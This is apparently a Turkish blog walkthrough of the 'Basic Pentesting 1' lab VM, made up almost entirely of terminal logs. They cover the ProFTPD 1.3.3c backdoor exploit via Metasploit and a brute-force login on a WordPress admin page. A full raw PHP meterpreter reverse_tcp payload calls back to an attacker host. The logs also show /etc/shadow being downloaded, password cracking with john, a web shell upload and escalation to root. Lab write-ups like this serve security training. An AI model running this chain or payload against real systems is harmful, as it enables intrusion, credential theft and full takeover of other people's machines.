Basic Pentesting 1 Walktgrough

[email protected]:~# nmap -sV -A -v 192.168.1.25

Nmap scan report for 192.168.1.25

Host is up (0.00071s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.3c

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)

| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)

|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Site doesn’t have a title (text/html).

MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 – 4.9

Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=258 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

  1. 0.71 ms 192.168.1.25

Proftpd için exploit Araması

msf5 > search proftpd

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)

1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 – 1.3.0 sreplace Buffer Overflow (Linux)

2 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)

3 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow

4 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution

5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name Current Setting Required Description

—- ————— ——– ———–

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 21 yes The target port (TCP)

Exploit target:

Id Name

— —-

0 Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25

rhosts => 192.168.1.25

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[email protected]:~/basic1# unshadow passwd shadow > merged

[email protected]:~/basic1# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

Cost 1 (iteration count) is 5000 for all loaded hashes

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press ‘q’ or Ctrl-C to abort, almost any other key for status

Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli

Use the “–show” option to display all of the cracked passwords reliably

Session completed

WordPress Vulnerability







msf5 > use auxiliary/scanner/http/wordpress_login_enum

msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin

username => admin

msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt

pass_file => /usr/share/wordlists/dirb/common.txt

msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/

targeturi => /secret/

msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30

rhosts1 => 192.168.1.30

msf5 auxiliary(scanner/http/wordpress_login_enum) >exploit


[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload

[-] No arch selected, selecting arch: php from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 1113 bytes

/*<?php /**/ error_reporting(0); $ip = ‘192.168.1.26’; $port = 6565; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();

msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.26

lhost => 192.168.1.26

msf5 exploit(multi/handler) > set lport 6565

lport => 6565

msf5 exploit(multi/handler) > run

meterpreter > download /etc/shadow

[*] Downloading: /etc/shadow -> shadow

[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow

[*] download : /etc/shadow -> shadow

meterpreter > download /etc/passwd

[*] Downloading: /etc/passwd -> passwd

[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd

[*] download : /etc/passwd -> passwd

meterpreter >

[email protected]:~# unshadow passwd shadow > merged

[email protected]:~# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

No password hashes left to crack (see FAQ)

[email protected]:~# cd ~/.john

[email protected]:~/.john# rm john.pot

[email protected]:~/.john# cd –

/root

[email protected]:~# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

Cost 1 (iteration count) is 5000 for all loaded hashes

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press ‘q’ or Ctrl-C to abort, almost any other key for status

Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli

Use the “–show” option to display all of the cracked passwords reliably

Session completed

[email protected]:~#

python -c ‘import pty; pty.spawn(“/bin/sh”)’ (http://netsec.ws/?p=337)

Bir Başka Yöntem


msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin

password => admin

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin

username => admin

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret

targeturi => /secret

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30

RHOSTS => 192.168.1.30

msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell

Process 558 created.

Channel 1 created.

sh: 0: getcwd() failed: No such file or directory

sh: 0: getcwd() failed: No such file or directory

python -c ‘import pty; pty.spawn(“/bin/sh”)’

sh: 0: getcwd() failed: No such file or directory

$ su – marlinspike

su – marlinspike

Password: marlinspike

[email protected]:~$ sudo bash

sudo bash

[sudo] password for marlinspike: marlinspike

[email protected]:~# whoami

whoami

root

SSH Walkthrough

[email protected]:~# ssh [email protected]

The authenticity of host ‘192.168.1.25 (192.168.1.25)’ can’t be established.

ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added ‘192.168.1.25’ (ECDSA) to the list of known hosts.

[email protected]’s password:

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

593 packages can be updated.

420 updates are security updates.

New release ‘18.04.3 LTS’ available.

Run ‘do-release-upgrade’ to upgrade to it.

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

[email protected]:~$

You may also like...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir